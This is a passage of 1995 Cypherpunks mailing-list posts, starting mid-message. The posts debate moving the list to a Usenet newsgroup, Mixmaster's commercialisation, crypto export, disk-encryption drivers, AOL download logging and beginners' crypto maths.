I think we should wait a while. I see USEnet going through some very dramatic changes quite soon, the infrastructure of newsgroups is now insufficient to support the cognitive complexity of discourse amongst so many people.
I expect more structured discourse models such as the lightweight link semantics of Openmeeting and Wit to percolate in, NCSA already have a version of hypernews with these features.

One thought to ponder on. There is no real difference in terms of resources required between a mailing list and an archive of a mailing list at a Web site. The latter does avoid a large number of unnecessary dispatches however.

Phill

From mark at unicorn.com  Sat Sep 16 10:53:11 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Sat, 16 Sep 95 10:53:11 PDT
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: 

On Sat, 16 Sep 1995 hallam at w3.org wrote:

> One thought to ponder on. There is no real difference in terms of resources
> required between a mailing list and an archive of a mailing list at a Web
> site. The latter does avoid a large number of unnecessary dispatches however.

However:

a) You can't read it through a remailer (yet).

b) Anyone watching the site can tell which threads you're interested in, and thereby determine what your real interests in this group are.

c) It cuts off anyone who doesn't have direct net access, or can't afford long telephone calls. It's a lot cheaper to download a day's mail in one go than to spend three hours browsing a WWW site.

Mark

From dmandl at panix.com  Sat Sep 16 11:01:54 1995
From: dmandl at panix.com (David Mandl)
Date: Sat, 16 Sep 95 11:01:54 PDT
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: 

At 1:33 PM 9/16/95, hallam at w3.org wrote:

>>Should there be an "alt.cypherpunks" type of newsgroup instead of this
>>mailing list?
>
>Bad idea, it would simply mean that every kook on USEnet would add
>alt.cypherpunks onto the crossposting line. We would have black
>helicopters, gun
>loons, Waco Wako's, Loonytarians and Turkish government propaganda spamming
>forever.

A lot of people on the list seem to see it as a corporation that has to show X% growth for its shareholders every year.
The list is a healthy size, and there are a lot of very bright people on it with very good ideas (a lot of the best people and best ideas in the field, in fact). Traffic is pretty high, too. I don't see any reason to try to increase our market share just for the sake of it.

Even worse, it seems to me that what some people are suggesting (and this comes up at least once a year) will lead to increased entropy, with us, the EFF, EPIC, etc., etc., blending into one amorphous lobbying blob. This is a unique list of people doing VERY IMPORTANT work that no one else is doing. To tell you the truth, I think that to date cypherpunks have left a much greater mark on the world than the EFF and all of the others. No question about it.

Again (as others have said over and over), if people are concerned about better lobbying, this isn't the place for it--and the good news for you is that there are plenty of other groups with the resources, staff, and mission to do it. So what's the problem?

If you're embarrassed mentioning our name to your straight friends, c'est la vie. I wish I could show my boss my brilliant article in the new issue of ANARCHY, but I can't.

--Dave.

--
Dave Mandl
dmandl at panix.com
http://wfmu.org/~davem

From dl at hplyot.obspm.fr  Sat Sep 16 11:20:08 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Sat, 16 Sep 95 11:20:08 PDT
Subject: [NOISE] Re: Linking = Showing = Transferring?
In-Reply-To: 
Message-ID: <9509161819.AA08057@hplyot.obspm.fr>

Alan Barrett writes:
> > I wonder if I have a pornopage.
> Of course you do (assuming the stupid transitive definition of a
> pornopage).
> Start at your home page [...]
One could define some kind of new metric: let dp(x) be the shortest number of hops to go from page x to any "porn" (sexy) page.

Now, I bet that dp(x) < infinity for any page x that has links on its site that go outside the site, thanks to the "strange attractor" represented by search engines & indexes, which are the most linked pages (mean dp is prolly around 4 or 5).

For instance, what is the pornography distance of whitehouse? Without complete search, their dp(http://www.whitehouse.gov/) <= 7:

-> textual representation of this page. {sorry, I had to go there, using lynx}
   http://www.whitehouse.gov/White_House/html/White_House_Home-plain.html
-> Executive Branch
   (http://www.whitehouse.gov/White_House/EOP/html/3_parts-plain.html)
-> government information locator service (GILS)
   (http://info.er.usgs.gov/gils/index.htm)
-> IMAGINATION NEEDED HERE!
   (http://www.usgs.gov/public/gils/imagine.html)
-> [Other Topics] {lots of remote pointers, but lots of outdated links too}
   (http://www.usgs.gov/public/gils/other.html)
-> Another List of Internet Search facilities {netscape's search page}
   (http://home.mcom.com/home/internet-search.html)
   Search for "playboy" for instance at infoseek, or anything in fact...
   (btw where is that fast playboy's mirror ?)
-> sexy pages!

Regards

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

From mfroomki at umiami.ir.miami.edu  Sat Sep 16 11:29:28 1995
From: mfroomki at umiami.ir.miami.edu (Michael Froomkin)
Date: Sat, 16 Sep 95 11:29:28 PDT
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: 
Message-ID: 

newsgroups get more spam. I'm getting ads from "janet.dove" for magazines via this list as it is...something to do with a gateway to a newsgroup I fear. If it's a newsgroup, I'll probably read it less.

" Life is too short for spam when you can have a Pommard."

A.
Michael Froomkin            | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law  | mfroomki at umiami.ir.miami.edu
U. Miami School of Law      | P.O. Box 248087
                            | It's hot here. And humid.
Coral Gables, FL 33124 USA  | See (soon to move to its real home):
http://www.law.miami.edu/~mfroomki

From liberty at gate.net  Sat Sep 16 12:17:20 1995
From: liberty at gate.net (Jim Ray)
Date: Sat, 16 Sep 95 12:17:20 PDT
Subject: (noise) Re: SPAM bait
Message-ID: <199509161913.PAA55049@tequesta.gate.net>

nobody at alpha.c2.org (Anonymous) wrote:
>
>Don't worry, "Janet Dove", or actually sanghi3 at grfn.org got mailbombed
>severely for this one. I'm just glad he doesn't know how to use remailers.

Good going, Anonymous. What I don't understand about inappropriate SPAMs like that one (or telephone ads) is: what's the business incentive to do it? I assume that no Cypherpunk has subscribed to "Janet's" magazines, and I know that no Ray has _EVER_ spent money over a telephone unless we initiated the call, yet *still* we get unwanted calls every once in a while. WHY?

[Please respond privately to liberty at gate.net ]

JMR

From pcw at access.digex.net  Sat Sep 16 12:22:24 1995
From: pcw at access.digex.net (Peter Wayner)
Date: Sat, 16 Sep 95 12:22:24 PDT
Subject: "Hackers"-- brief review and anecdote...
Message-ID: 

I saw "Hackers" yesterday. It's not bad and its political sensibility is very cyberpunk. The ad campaign even uses the tag line, "Their only crime is curiosity." Given that a major studio is spending beaucoup bucks to spread this tag line, I think it is safe to say that cyber issues are very mainstream by now. Still edgy enough to be exciting to many, but definitely comprehensible.

The characters are just a bit too cool for school and some of the notes ring false. The evil one, a corporate computer security officer, would have been better served by someone who is not as laughable as Fisher Stevens. I could probably hit the escape key on my computer here and he would cringe.
Jeremy Irons or Klaus Maria Brandauer would have been more inspired. But they can't skateboard.

I also stopped by the Department of Motor Vehicles yesterday. The lines were long and I soon found myself grousing along with the guy behind me. He was about 60 years old and not part of the cyberpunk generation in any way. After I said some libertarian thing by wondering aloud about why we even needed to have such a huge bureaucracy centered around cars, he said, "Yeah. Have you seen all the land they have down in Fort Meade. Beautiful land and they just spend their time down there spying on the people."

He lumped the NSA in with the DMV. To him, it was just one big bureaucracy.

-Peter

From syrinx at c2.org  Sat Sep 16 12:30:08 1995
From: syrinx at c2.org (syrinx@c2.org (Syrinx Anonymous Remailer))
Date: Sat, 16 Sep 95 12:30:08 PDT
Subject: Commercial Mixmaster
Message-ID: <199509161921.MAA05294@infinity.c2.org>

nelson at crynwr.com (Russell Nelson) wrote:

> There *will* always be a free version of the client with source
> code, but the proprietary improvements will probably not be merged
> into the free version.  Lance, and only Lance, as copyright holder,
> has the right to publish the code under a different copyright.  It's the same
> thing that Phil Z. did with ViacryptPGP.

It's not the same thing, though. PGP 2.6.2 and PGP 2.7 are compatible. You can compile 2.6.2 from the sources and have it interoperate with Viacrypt 2.7.

The concern is not "commercialization", per se, but rather the use of "commercialization" as an excuse to build in "proprietary" features (Back doors?) for which no corresponding source code is involved.

Since no one has made a good case for there even being a COMMERCIAL market for Mixmaster, could there be other motives? Without building an anonymous e-$ infrastructure first, there's no way to even charge for the use of a remailing service without sacrificing anonymity, even if people were willing to pay to have messages anonymously remailed.
No, I'm not accusing Lance. But if he no longer has the time to support Mixmaster, then perhaps some other crypto-friendly group should take over the task and keep it an OPEN system, with source code available. In fact, even freezing Mixmaster as is would be preferable to "improvements" that people don't/can't trust.

True, they *COULD* provide source code, but how many commercial products come with complete source code?

From dl at hplyot.obspm.fr  Sat Sep 16 12:30:10 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Sat, 16 Sep 95 12:30:10 PDT
Subject: Linking = Showing = Transferring?
In-Reply-To: <9509151114.AA07872@sulphur.osf.org>
Message-ID: <9509161929.AA08458@hplyot.obspm.fr>

Rich Salz writes:
> Inline images are not references -- they are part of the page being
> retrieved.

I don't agree...

> > >So that the image is *imported* by the *viewer*, and not supplied by
> >www.obscura.

indeed

> Inlined images are just a convenient way of chunking.  The image is imported
> by the viewer because the server, as part of the base document, told it
> to do so.  You might be able to fool an ignorant court, but it still
> doesn't change the fact that Lance has a document that in the natural
> course of operation of the Web, exports crypto.
                                 *******
[...]

Oh? Exports from the UK to the UK, for instance?? How could it export anything without any packet crossing a "border", even a virtual one?

Maybe it violates some rules about spreading information, knowledge of where to find 'offending' materials, but this is certainly not breaking any export rules... IMO

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

From droelke at rdxsunhost.aud.alcatel.com  Sat Sep 16 12:30:17 1995
From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 16 Sep 95 12:30:17 PDT
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <9509161930.AA08524@spirit.aud.alcatel.com>

Although Tim is quite happy with Eudora's (or whatever it is) email handling techniques, I would also prefer a way in which to use my Usenet tools on the cypherpunks list.

BUT I think that making it a newsgroup opens up the volume to a level far beyond what it is now. It will also result in a far larger level of "noise" due mostly to cross-posts.

My plan is to gate cypherpunks to a local newsgroup (local to my machine only) and read it that way. Is it more work for me that way? - yes, but I'd prefer to do the extra work required than lose what this group has as a mailing list.

Now - if someone wants to start a separate alt.cypherpunks group, but *NOT* gateway this list to it - be my guest. People can then vote with their feet which is the better "medium" or transport method.

Dan

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke at aud.alcatel.com                   Richardson, TX

From iagoldbe at csclub.uwaterloo.ca  Sat Sep 16 12:40:45 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Sat, 16 Sep 95 12:40:45 PDT
Subject: cypherpunks as a newsgroup
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID: <43f97c$64n@calum.csclub.uwaterloo.ca>

In article , Dr. Dimitri Vulis wrote:
>aba at dcs.exeter.ac.uk writes:
>> One thing I have been thinking would be nice would be a USENET
>> newsgroup, as mailing lists are a step away from easy access which
>> some people never make.
>
>This sounds like a very good idea to me, since I find the flood of
>e-mail from CP, much of it non-crypto-related, to be annoying. If
>this traffic were in a newsgroup, it would travel compressed over
>my phone line, and I might use a killfile on stuff like the CO$ thread.
>
>Anything posted to the main cypherpunks mailing list and the spun-off mailing
>lists (steganography, remailers, nym servers, etc) could be posted to the
>newsgroup by making one of the mail2news gateways a subscriber.

That was my thinking exactly. That's why I wrote just such a mail2news gateway to a local newsgroup, csc.lists.cypherpunks (moderated, with cypherpunks at toad.com as the moderator), as you can probably see in the header. This way, trn groups all articles with the same subject together, and correctly threads articles that have References: or In-Reply-To: headers.

As for the location, I'd agree with comp.security.cypherpunks. Watch out, though; the list/group will probably get a much higher readership as a newsgroup. Although this is good for the "make the public aware" goal, remember that, as far as I can tell, September 1992 never ended.

I've been very impressed with the signal/noise ratio on this list. In fact, people often put [NOISE] in the subject line to flag trivial content. This ratio will certainly go down if we go to a newsgroup.

One of the main benefits of Usenet is that anyone can _post_.
One of the main detriments is that _anyone_ can post.

   - Ian "that would have been much more elegant in Latin"

From goedel at tezcat.com  Sat Sep 16 12:47:13 1995
From: goedel at tezcat.com (Dietrich J. Kappe)
Date: Sat, 16 Sep 95 12:47:13 PDT
Subject: alt.cypherpunks
Message-ID: 

-----BEGIN PGP SIGNED MESSAGE-----

>Hi all,
>
>My vote is to let the folks on usenet sink in their own quagmire of
>ignorance about what we do. This list is no secret. If somebody wants to
>get into the 'game' let them bloody well subscribe.
>
>Ta ta.

I should mention that the literate programming mailing list somehow died when it moved to comp.programming.literate. Something about the nature of usenet took the life out of it.

Besides, does anyone want the inevitable "How can I get my Win95 PC to run doom?" questions?
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMFs3bHIf3YegbdiBAQEu7AJWLFim1gdvzCy1+WpPzr8lxcDMmYcxIOyH
3XqR+7YSfEoPEW23Gq73BBU658leNKspGwJQ1a+7qnFsDRL1+TEe/V4meOwfyoWq
aNcn
=YLv5
-----END PGP SIGNATURE-----

Dietrich Kappe   | Red Planet http://www.redweb.com
Red Planet, LLC  | "Chess Space" | "MS Access Products" | PGP Public Key
1-800-RED 0 WEB  | /chess        | /cobre               | /goedel/key.txt
Web Publishing   | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84

From rsalz at nntp.com  Sat Sep 16 13:09:22 1995
From: rsalz at nntp.com (Rich Salz)
Date: Sat, 16 Sep 95 13:09:22 PDT
Subject: Commercial Mixmaster
Message-ID: <199509162008.QAA06266@nntp.com>

>The concern is not "commercialization", per se, but rather the use
>of "commercialization" as an excuse to build in "proprietary"
>features (Back doors?) for which no corresponding source code is
>involved.
>
>Since no one has made a good case for there even being a COMMERCIAL
>market for Mixmaster, could there be other motives?
...
>
>No, I'm not accusing Lance. But if he no longer has the time to
>support Mixmaster, then perhaps some other crypto-friendly group
>should take over the task and keep it an OPEN system, with source
>code available. In fact, even freezing Mixmaster as is would be
>preferable to "improvements" that people don't/can't trust.

This doesn't make sense. Someone wants to commercialize Mixmaster. You don't know who it is, but since you can't see how to make money doing this, you suspect their motives. Yet on the other hand, you think they will be so successful that enough people will buy binary-only servers such that backdoors are a real threat, perhaps by forcing people to upgrade or otherwise breaking interoperability with the current free-source remailer network.

You can't have it both ways.

But even if you could, there's a solution. :) Download the source and start releasing "blender", a free-source anonymous remail system that is upwardly compatible, *and based on* the current Mixmaster.
/r$

From JohnHemming at mkn.co.uk  Sat Sep 16 13:10:51 1995
From: JohnHemming at mkn.co.uk (John Hemming CEO MarketNet)
Date: Sat, 16 Sep 95 13:10:51 PDT
Subject: More on ECheques
Message-ID: <1995-Sep16-205309.1>

unicorn at polaris.mindport.net wrote:

>> 1. I was not suggesting that you put your real bank account number
>> in the program. A test number is perfectly adequate.

>(But I will clone some checks and drain your account quickly).

Really ..... how.

From keelings at wu1.wl.aecl.ca  Sat Sep 16 13:12:22 1995
From: keelings at wu1.wl.aecl.ca (S. Keeling)
Date: Sat, 16 Sep 95 13:12:22 PDT
Subject: WAS_tem (fwd)
Message-ID: <9509162012.AA29482@wu1.wl.aecl.ca>

Incoming from Rev. Ben:
>
> On Thu, 14 Sep 1995, James A. Donald wrote:
>
> > If you draw a picture using paintbrush of an underage person engaging
> > in sexual conduct, you are in violation of this proposed legislation.
>
> Doesn't that directly contradict the stated purpose of existing child
[snip]
>
> Do the lawyers on the list want to pipe up?

On cypherpunks?!? Whatever for? I imagine there's already a rousing discussion going on about this somewhere in AOL. Take it there.

--
"Remember, obsolescence (Win95) isn't an accident; it's an art form!"
keelings at wu1.wl.aecl.ca
s. keeling, aecl - whiteshell labs

From alano at teleport.com  Sat Sep 16 13:13:45 1995
From: alano at teleport.com (Alan Olsen)
Date: Sat, 16 Sep 95 13:13:45 PDT
Subject: SecureDrive News - Win95 yes, Iomega zip drive no
Message-ID: <199509162013.NAA06723@desiree.teleport.com>

At 02:33 AM 9/16/95 PDT, you wrote:

>I'm sorry to report that SecureDrive does not support the Iomega ZIP
>drive.  I believe that's because the TSR driver supplied with the
>hardware does not support a DiskBIOS interface.
>
>I had thought that Secure Device, another real-time encryption system,
>would support this drive, since it works through a device driver
>mapped to a dos file.  But an actual trial proved otherwise.
>The
>problem is that the DOS file must be present when the CONFIG.SYS
>DEVICE= statement for the SECDEV.SYS is processed.  But the zip drive
>driver is a TSR that doesn't get loaded until after all DEVICE
>statements have been processed.  There's no particular reason that
>Iomega couldn't have written their driver as an MSDOS device driver
>rather than a TSR, in which case SecureDevice would probably work, but
>they didn't, so it doesn't.

There is a Win95 driver for the Zip drive that does not use a TSR. It is a parallel to SCSI driver that is added through the "add hardware" control panel. I am not certain as to the order that the drivers load. I will have to test it. (The driver was released on the 9th of this month with little or no instructions.)

Having encrypted Zip drives would be VERY useful.

I will see if Borland's latest update for the C++ compiler has any additional information as to some of the driver interface issues (I doubt it, but it is worth a try). It is supposed to arrive "any day now", but it is backordered so who knows when I will get it.

I may have to spend the bucks and get the Microsoft development disc subscription again. It will most likely have the information needed to convert the drivers to something Win95 will understand.

|       Visualize whirled keys                    | alano at teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|     -- PGP 2.6.2 key available on request --    | behind the keyboard. |
|         http://www.teleport.com/~alano          |                      |

From greg at ideath.goldenbear.com  Sat Sep 16 13:16:49 1995
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Sat, 16 Sep 95 13:16:49 PDT
Subject: C-punks, marketing for the masses
Message-ID: <199509162008.AA03860@ideath.goldenbear.com>

-----BEGIN PGP SIGNED MESSAGE-----

No disrespect intended, but I think that the various "let's sanitize the Cypherpunk message for mass acceptance" marketing/soundbite proposals are pointless.
Cypherpunks is a mailing list, not a political party (or a platform).

- From my perspective, the organizing meme for the list is not "strong crypto is really important, so let's write some and lobby our lawmakers to make sure it stays legal" but "strong crypto is here and is changing the dynamics of force, politics, and power, so let's see what we can do with it." (And no, I don't think it's important to spread that "meme" (a term I use with some trepidation) around to get "market share" for it. Ideas are not football teams nor initiative proposals.)

I appreciate and support and have participated in various write-yer-legislator activities. They're useful short-term. But if Tim May and Duncan Frissell and the other list members who've dared to make predictions about the impact of crypto on government and economics are correct, what the government and the legislators want doesn't matter. If they're wrong, what we want doesn't matter.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFsujH3YhjZY3fMNAQHfogP9HMEe6/N7B0q4cov8knythwuqha4yFmsR
Yfxtp8/ukXhfJlJQ5Mb40AYWcNwWGXmzd8J2KzrYBntKN60SZnd/StRQfHs6rtre
hLHZGss4bR1c9w0+Jsr3TKD5UQe2up2cEuY9u6qN6QyVK9h9QtfSHpJqb3bAZlla
fA3GMtB2qlc=
=Phdj
-----END PGP SIGNATURE-----

From greg at ideath.goldenbear.com  Sat Sep 16 13:17:59 1995
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Sat, 16 Sep 95 13:17:59 PDT
Subject: CYPHERPUNK considered harmful.
Message-ID: <199509162015.AA03916@ideath.goldenbear.com>

-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn writes:

> Some months ago I called for advanced stego and stealth PGP as well as
> larger keys in the event we all had to go "into the crypto closet" for a
> time.

> I call for them again.

I know of three ways to get software:

1. Write it yourself.
2. Pay someone else to write it.
3. Find software someone else wrote that meets your needs.

If (3) isn't working, perhaps you should try (1) or (2).

(I've been "calling for" a big house with a hot tub for years now.
Still no progress. I'll let you know if it works out.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFswPX3YhjZY3fMNAQHatwP/ZJKuNEDRPdCldyvshGkG/w/io+37zx3m
DyJ4h1+OicxYCtKbolXYVcX8C4d1j7hXY2sesepcDvYYyy+butdQ+/2tw3u0FW1j
WpfCGURpypBVb5T7QlL21Qv39cBIu9mJxkasPkQSeSnrC24eGtoItmZzrIRZgJyj
Dj2FOIfxiFY=
=5DwJ
-----END PGP SIGNATURE-----

From alano at teleport.com  Sat Sep 16 13:41:36 1995
From: alano at teleport.com (Alan Olsen)
Date: Sat, 16 Sep 95 13:41:36 PDT
Subject: cypherpunks as a newsgroup
Message-ID: <199509162041.NAA10780@desiree.teleport.com>

At 03:40 PM 9/16/95 -0400, Ian wrote:

>I've been very impressed with the signal/noise ratio on this list.
>In fact, people often put [NOISE] in the subject line to flag trivial
>content. This ratio will certainly go down if we go to a newsgroup.

I have a group of friends who get forwarded the "best" of the Cypherpunks list. The signal to noise ratio is high enough that I have to be careful how much I forward lest I get complaints at the volume of what I forward. Turning this into an alt group would destroy that.

>One of the main benefits of Usenet is that anyone can _post_.
>One of the main detriments is that _anyone_ can post.

How true.

|       Visualize whirled keys                    | alano at teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|     -- PGP 2.6.2 key available on request --    | behind the keyboard. |
|         http://www.teleport.com/~alano          |                      |

From ic58 at jove.acs.unt.edu  Sat Sep 16 13:42:18 1995
From: ic58 at jove.acs.unt.edu (Childers James)
Date: Sat, 16 Sep 95 13:42:18 PDT
Subject: Newbie Crypto question: MOD?
Message-ID: 

Ok folks, I recently received "Applied Cryptography" as a gift, and just have one question: How does the MOD function work in crypto functions? It seems to work differently than what I've seen before, i.e.: C/C++ MOD. I also didn't see anything in TCM's FAQ...

If this is considered noise, I apologize in advance.
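The difference the question above is running into, as an added example that is not part of the original post or of "Applied Cryptography": C's `%` is a truncating remainder that takes the sign of the dividend, while the "mod" of the crypto texts always means the unique residue in [0, m). The block below shows both, then the two operations that textbook "mod" is really there for: modular exponentiation (square-and-multiply, reducing after every step so nothing overflows) and the modular inverse via the extended Euclidean algorithm. All function names are hypothetical, and `mul_mod` assumes the modulus fits in 32 bits so that a product of two residues fits in a `uint64_t`; that assumption is stated again in the code.

```c
#include <stdio.h>
#include <stdint.h>

/* What C's % actually does: truncating division, so the remainder
 * takes the sign of the dividend. In C99/C++11, -7 % 5 == -2. */
int64_t c_remainder(int64_t a, int64_t m) {
    return a % m;
}

/* The "mod" of the crypto texts: the unique r in [0, m) with
 * a == q*m + r for some integer q. Assumes m > 0. */
int64_t mod_floor(int64_t a, int64_t m) {
    int64_t r = a % m;
    return r < 0 ? r + m : r;
}

/* Modular multiplication. Assumption for this example: m < 2^32, so
 * the product of two residues fits in a uint64_t without overflow. */
uint64_t mul_mod(uint64_t a, uint64_t b, uint64_t m) {
    return (a % m) * (b % m) % m;
}

/* base^exp mod m by square-and-multiply. Reducing after every step keeps
 * every intermediate below m*m; computing base^exp first and reducing
 * once would overflow for any realistic exponent. This is the operation
 * behind RSA and Diffie-Hellman. */
uint64_t mod_pow(uint64_t base, uint64_t exp, uint64_t m) {
    uint64_t result = 1 % m;   /* 1 % m handles the degenerate m == 1 */
    base %= m;
    while (exp > 0) {
        if (exp & 1)
            result = mul_mod(result, base, m);
        base = mul_mod(base, base, m);
        exp >>= 1;
    }
    return result;
}

/* Multiplicative inverse via the extended Euclidean algorithm: returns
 * x in [1, m) with a*x == 1 (mod m), or 0 when gcd(a, m) != 1, in which
 * case no inverse exists. Assumes m > 1. */
int64_t mod_inverse(int64_t a, int64_t m) {
    int64_t old_r = mod_floor(a, m), r = m;
    int64_t old_s = 1, s = 0;  /* Bezout coefficient of a, tracked alongside */
    while (r != 0) {
        int64_t q = old_r / r;
        int64_t t = old_r - q * r; old_r = r; r = t;
        t = old_s - q * s;         old_s = s; s = t;
    }
    if (old_r != 1)
        return 0;              /* gcd != 1: not invertible */
    return mod_floor(old_s, m);
}

int main(void) {
    printf("C:    -7 %% 5      = %lld\n", (long long)c_remainder(-7, 5));
    printf("math: -7 mod 5    = %lld\n", (long long)mod_floor(-7, 5));
    printf("4^13 mod 497      = %llu\n", (unsigned long long)mod_pow(4, 13, 497));
    printf("3^-1 mod 11       = %lld\n", (long long)mod_inverse(3, 11));
    printf("17^-1 mod 3120    = %lld\n", (long long)mod_inverse(17, 3120));
    printf("6^-1 mod 9        = %lld (0 means no inverse)\n", (long long)mod_inverse(6, 9));
    return 0;
}
```

The `mod_floor` fix-up matters wherever a negative intermediate can appear (the subtraction step of extended Euclid is the usual place): feeding a C-style negative remainder into a later multiplication silently produces wrong residues, and a wrong residue in a key-setup routine is the kind of bug that looks like working code until interoperability breaks.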
"Freedom is meaningless unless   | ic58 at jove.acs.unt.edu - James Childers
you can give to those with whom  | No man's freedom is safe
you disagree." - Jefferson       | while Congress is in session
EA 73 53 12 4E 08 27 6C 21 64 28 51 92 0E 7C F7

From darkness at darkness.vnet.net  Sat Sep 16 13:55:25 1995
From: darkness at darkness.vnet.net (darkness at darkness.vnet.net)
Date: Sat, 16 Sep 95 13:55:25 PDT
Subject: SecureDrive News - Win95 yes, Iomega zip drive no
In-Reply-To: <199509162013.NAA06723@desiree.teleport.com>
Message-ID: <199509162056.QAA03317@darkness.vnet.net>

-----BEGIN PGP SIGNED MESSAGE-----

>Date: Sat, 16 Sep 1995 13:13:49 -0700
>From: Alan Olsen
>
>At 02:33 AM 9/16/95 PDT, you wrote:
>
>>I'm sorry to report that SecureDrive does not support the Iomega ZIP
>>drive.  I believe that's because the TSR driver supplied with the
>>hardware does not support a DiskBIOS interface.
>>
>>I had thought that Secure Device, another real-time encryption system,
>>would support this drive, since it works through a device driver
>>mapped to a dos file.  But an actual trial proved otherwise.  The
>>problem is that the DOS file must be present when the CONFIG.SYS
>>DEVICE= statement for the SECDEV.SYS is processed.  But the zip drive
>>driver is a TSR that doesn't get loaded until after all DEVICE
>>statements have been processed.
[...]

Have you tried an 'INSTALL=' line in the CONFIG.SYS to load the drive's TSR first? INSTALL is a rarely-documented feature for the CONFIG.SYS to load a TSR during its processing. I believe it also saves memory by not loading some sort of header into memory (DOS PSP maybe?), which may also cause a problem. Can't hurt to try though, eh?
darky

- --
============================================+================================
darkness (darky) || keys under 'darkness'   | 596F7527766520676F742061206672
PGP mail preferred || Key on public servers | 69656E6420696E204269672042726F
email: darkness at darkness.vnet.net         | 746865722053656375726974792E0A
KeyID: D7E4CA65 / PGPprint = 43 1A 4A 36 4E 79 55 40 04 A1 CA F0 B9 BC 45 86

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFs6EpaAhnnX5MplAQGCUQP9Fb2oUikx9qEHJXBb4nZHtTjZewwn9FZt
UZFxAf42IOyCFKxayanJTkwWkJQqDvetg1P0wvOrK+IRWxvmfvxze/pXQBrGAaqS
oKGdhW0C5Wjol2ffgATh0K3a3ztd/klRd0dySQMISxz/DTcqvTxtW5n7+965VJT+
5akW4nJL558=
=YrYU
-----END PGP SIGNATURE-----

From vznuri at netcom.com  Sat Sep 16 13:58:21 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Sat, 16 Sep 95 13:58:21 PDT
Subject: AOL monitoring
Message-ID: <199509162055.NAA22204@netcom3.netcom.com>

hello, apparently the recent FBI sting happened with the cooperation of AOL, which allowed the FBI to monitor downloads..

here's some info to test if you are being monitored on AOL

------- Forwarded Message

Date: Sat, 16 Sep 1995 14:47:38 -0400
To: snet-l at world.std.com
From: Charles Zeps
Subject: How to find out if you are sniffed at AOL

> America Online Opens Private E-mail to Federal Sting
> (c) 1995 N.Y. Times News Service
>
>(14 Sept. 1995 ) Responding to court orders related to a
>nationwide crackdown on the electronic transmission of child pornography,
>America Online, the nation's largest information service, gave law
>enforcement agents access to the private electronic mailboxes of an unknown
>number of its subscribers, company officials confirmed Thursday.

From: Eric Muetterties

All you America online users would be wise to check out your software...(WINDOWS)

Use a file viewer that will allow you to view in hexadecimal. Or use the DOSSHELL.EXE program in your DOS directory and use the menu to VIEW file contents.

Find your Aonline directory and find the directory marked IDB.
This should have two files marked with your screen name and a suffix of either .arh or .pnd (eg. ericmuette.arh)

With the file loaded in the viewer you will see the hex dump of these files. In the side pane will be the equivalent ASCII of the hexadecimal dump (in layman's terms... if there is text you will recognize it...)

Use PAGE DOWN to move down through the files.... soon you will recognize the first files you downloaded and references to where you were on the internet and what directory you saved the file to.

Make these files READ ONLY with the file attributes menu in your file manager and they cannot use this facility../

You will get an error message when you first start up ("XFER ERROR - - - could not create database"). Click on "OK" and program will continue. Then when program gives you messages when you try to save to disk or download something just click on "IGNORE" till program continues (usually 3 times).

When they realize everyone is defeating this they can easily come up with a more covert way of tracking you but in the meantime... ... better to change to another provider...

You will be amazed at your friends' expressions when you get on their computer and tell them what they have downloaded.

If you view the files in the TOOLS directory, at the end of the files you will find the internal names for these programs such as "Internal DAtabase", ETC. !!!

Have fun... Big Bro is here in a BIG WAY... MIND YOUR P's and Q's on the NET !!!

E. Muetterties

If you can't figure out how to do this email me with what is in your "IDB" directory and I'll tell you which files to view.

ericm3 at ix.netcom.com

Linda Thompson
American Justice Federation
Home of AEN News and "Waco, the Big Lie" "America Under Siege"
3850 S. Emerson Ave.
Indianapolis, IN 46203
Telephone: (317) 780-5200
Fax: (317) 780-5209
Internet: lindat at iquest.net

"When even one American -- who has done nothing wrong -- is forced by fear to shut his mind and close his mouth, then all Americans are in peril." Harry Truman

From dan at milliways.org Sat Sep 16 14:14:07 1995
From: dan at milliways.org (Dan Bailey)
Date: Sat, 16 Sep 95 14:14:07 PDT
Subject: Rosing's Elliptic curve documentation question
Message-ID: <199509162113.AA09748@ibm.net>

I was reading Mike Rosing's documentation for his elliptic curve system from the Cypherpunks FTP site. In it, he uses the notation:

    sum a_i*b^2^i

Now, like a good little Calculus 2 student, I assumed this must be a regular summation. But if so, which is the index of summation, and what are the bounds of summation? Someone want to give me a clue as to what this notation means?

Dan Bailey

***************************************************************
#define private public
dan at milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************

From alano at teleport.com Sat Sep 16 14:25:54 1995
From: alano at teleport.com (Alan Olsen)
Date: Sat, 16 Sep 95 14:25:54 PDT
Subject: [NOISE] Re: SecureDrive News - Win95 yes, Iomega zip drive no
Message-ID: <199509162125.OAA17362@desiree.teleport.com>

At 04:56 PM 9/16/95 -0400, darky wrote:
